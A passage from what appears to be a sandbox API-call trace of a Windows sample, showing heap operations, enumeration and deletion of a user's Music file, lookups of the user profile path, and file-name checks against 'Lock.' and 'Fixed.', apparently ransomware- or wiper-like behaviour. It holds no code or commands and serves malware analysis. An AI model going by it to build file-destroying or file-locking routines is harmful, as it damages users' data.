lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5da723d0, ftCreationTime.dwHighDateTime=0x1d4d4de, ftLastAccessTime.dwLowDateTime=0xb43d00b0, ftLastAccessTime.dwHighDateTime=0x1d4d525, ftLastWriteTime.dwLowDateTime=0xb43d00b0, ftLastWriteTime.dwHighDateTime=0x1d4d525, nFileSizeHigh=0x0, nFileSizeLow=0x11122, dwReserved0=0x1311, dwReserved1=0x4, cFileName="QeeT.m4a", cAlternateFileName="")) returned 0xaa5920 [0252.506] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\QeeT.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\qeet.m4a")) returned 1 [0252.508] FindNextFileW (in: hFindFile=0xaa5920, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5da723d0, ftCreationTime.dwHighDateTime=0x1d4d4de, ftLastAccessTime.dwLowDateTime=0xb43d00b0, ftLastAccessTime.dwHighDateTime=0x1d4d525, ftLastWriteTime.dwLowDateTime=0xb43d00b0, ftLastWriteTime.dwHighDateTime=0x1d4d525, nFileSizeHigh=0x0, nFileSizeLow=0x11122, dwReserved0=0x1311, dwReserved1=0x4, cFileName="QeeT.m4a", cAlternateFileName="")) returned 0 [0252.508] FindClose (in: hFindFile=0xaa5920 | out: hFindFile=0xaa5920) returned 1 [0252.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0252.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0252.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0252.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0252.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0252.509] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0252.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0252.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0252.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0252.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0252.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0252.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0252.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0252.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0252.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0252.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0252.509] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0252.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0252.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0252.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa520 [0252.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0252.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0252.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaac0 [0252.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0252.510] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0252.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0252.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0252.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0252.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0252.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0252.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0252.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0252.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0252.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0252.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0252.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0252.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0252.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0252.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0252.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0252.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0252.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x90) returned 0x24207f0 [0252.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0252.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0252.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0252.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0252.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0252.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0252.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0252.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0252.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0252.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0252.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0252.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0252.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0252.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0252.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0252.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0252.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0252.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0252.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0252.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0252.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0252.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0252.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x5a) returned 0x240da88 [0252.512] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\QeeT.m4a", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\QeeT.m4a", lpFilePart=0x8bf658*="QeeT.m4a") returned 0x2c [0252.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240da88 | out: hHeap=0x25c0000) returned 1 [0252.513] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\QeeT.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\qeet.m4a")) returned 0xffffffff [0252.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0252.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0252.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0252.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0252.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0252.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0252.513] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0252.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0252.513] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0252.513] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0252.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0252.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0252.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0252.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0252.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0252.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0252.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0252.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0252.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0252.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0252.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0252.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0252.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0252.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qjSu2Nf.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0252.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jSu2Nf.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0252.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Su2Nf.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0252.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="u2Nf.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0252.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2Nf.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0252.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Nf.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0252.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0252.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0252.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0252.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0252.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0252.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0252.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0252.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0252.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0252.515] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0252.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0252.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0252.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0252.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0252.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0252.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0252.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0252.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0252.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0252.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0252.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0252.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0252.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0252.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0252.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0252.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0252.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0252.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0252.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0252.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0252.517] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qjSu2Nf.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0252.517] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jSu2Nf.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0252.517] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Su2Nf.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0252.517] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="u2Nf.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0252.517] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2Nf.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0252.517] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Nf.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0252.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0252.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0252.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0252.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0252.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0252.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0252.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0252.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0252.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0252.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0252.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0252.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0252.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0252.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0252.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0252.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9390 | out: hHeap=0x25c0000) returned 1 [0252.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9390 [0252.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0252.518] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0252.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0252.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0252.519] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0252.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0252.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0252.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0252.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1808 [0252.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0252.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0252.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0252.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0252.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0252.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0252.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0252.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0252.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0252.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0252.520] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0252.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0252.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0252.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa520 [0252.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0252.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0252.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa340 [0252.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0252.520] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf3b0, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0252.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0252.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0252.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0252.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0252.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0252.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0252.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0252.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0252.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0252.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0252.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0252.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0252.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0252.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0252.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0252.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0252.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x90) returned 0x24207f0 [0252.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0252.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0252.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0252.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0252.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0252.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0252.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0252.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0252.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0252.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0252.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0252.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1758 [0252.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0252.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0252.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0252.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0252.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0252.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0252.523] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0252.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0252.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0252.523] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0252.523] RtlAllocateHeap 